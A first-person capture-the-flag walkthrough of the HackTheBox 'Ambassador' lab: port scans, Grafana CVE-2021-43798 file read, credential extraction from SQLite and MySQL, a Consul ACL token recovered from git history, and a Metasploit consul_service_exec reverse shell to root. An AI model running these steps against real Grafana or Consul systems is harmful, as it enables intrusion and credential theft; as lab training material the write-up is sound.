The first thing I did on this machine was to some preliminary port scans to see services were available and what I should focus on first.
Nmap: Nmap nmap -sV -sC -Pn 10.10.11.138
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
3000/tcp open ppp?
3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
Rustscan: Rustscan rustscan -a 10.10.11.138
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
3306/tcp open mysql syn-ack
With the results from these two scans I decided to begin by looking at the main website hosted on port 80. After looking the website over thoroughly I discovered nothing except that the website was generated by Hugo 0.94.2 static site generator.
Since the main site appeared to be a dead end I started to focus my attention on what was hosted on port 3000. After looking through the Nmap results I decide that the service could be a website so I attempted to browse to it and realized that it was a login for an application called Grafana. After doing some research I learned that Grafana is a database visualizer to help developers look at database analytics and explore data trends.
Armed with this information I started looking for CVEs on this application to see if there were any known vulnerabilitys. After lots of searching I found a GitHub repository and an exploit db exploit that both talked about CVE 2021-43798. With both of these I was able to get an LFI and read three of the config files for Grafana. The files were /var/lib/grafana/grafana.db, /conf/defaults.ini, and /etc/grafana/grafana.ini. Using an online SQLite database browser I looked through the database at each table to see if their were any credentials that I could use. As I was searching I stumbled on a table called data_source Which had they MySQL Grafana username and password
grafana:dontStandSoCloseToMe63221!
With these credentials I ran the MySQL command to connect to the server and entered the username and password that I found.
mysql -u grafana -h 10.10.11.183 -p
Success, I was into the database. Using the show databases; command I found a database called whackywidget After using the use whackywidget; command to select the database I ran the command show tables;. This command only showed one table called users. After running select * from users; I received one entry.
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.053 sec)
I then went to Cyber Chief and decoded the password from base64.
developer:anEnglishManInNewYork027468
Next I took the credentials and ran the ssh command to ssh in to the Ambassador machine. I then ran the cat command to get the user flag and submitted It.
Privilege Escalation
Once I was on the machine as the developer user I started looking through the home folder for any paths to escalate my privileges. After lots of searching I discovered a .gitconfig file. Inside the files was information on a GitHub repository that the developer user was working on.
[user]
name = Developer
email = developer@ambassador.local
[safe]
directory = /opt/my-app
Taking this information I decided to see what project that this user was working on. In the /opt/my-app directory I found an app called whackywidget which was the same as the name of the database holding the developer ssh credentials. Inside the whackywidget folder I found a bash script called put-config-in-consul.sh. After some googling I found out that Consul is a data center grade monitoring software. After opening the bash script I saw that their was a consul command to store the MySQL password in the consul KV Store. When I copied the command to try to run it I just got an error saying that I needed to get a ACL_TOKEN. Since I new I needed a key I ran the git log command to see it the ACL_TOKEN was once hard coded into the put-config-in-consul.sh script. I looked through the results and found a commit that changed the config script. I decided to check and see if this was the right commit so I ran git show c982db8eff6f10f8f3a7d802f79f2705e7a21b5.
commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 23:44:45 2022 +0000
config script
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
new file mode 100755
index 0000000..35c08f6
--- /dev/null
+++ b/whackywidget/put-config-in-consul.sh
@@ -0,0 +1,4 @@
+# We use Consul for application config in production, this script will help set the correct values for the app
+# Export MYSQL_PASSWORD before running
+
+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
I then ran the consul kv put command to make sure that the token was valid.
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw "Test_Password"
And sure enough that command ran successfully. I then change the command to get the key to make sure that it saved the password.
consul kv get --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw
And this command work as well. Taking this information I when on my machine and started msfconsole using the sudo msfconsole command. Once Metasploit was started I used the search consul command to look up consul. After looking through the list I decide to try the consul_service_exec attack so I ran the use exploit/multi/misc/consul_service_exec command. I than ran the show options command to see what information I needed to fill out. using the set command I when through and set all of the variables and ran the command.
set RHOSTS 127.0.0.1
set LHOST MY_HTB_VPN_IP
set SRVHOST MY_HTB_VPN_IP
set ACL_TOKEN bb03b43b-1d81-d62b-24b5-39540ee469b5
Once I had all the options filled I was ready to run the exploit but first I had to forward the consul port. To do this I went to by ssh session with the developer user and I did the following.
cat
~C
-L 5800:localhost:5800
^C
Once I had the ports forwarded correctly I ran the run command. When the meterpreter shell came up I ran the shell command to get an interactive reverse shell with the root user on Ambassador. Finally, I ran the id command to confirm that I was root and then I ran the cat command to get the root flag.
cat /root/root.txt
054af7b*********************a2b6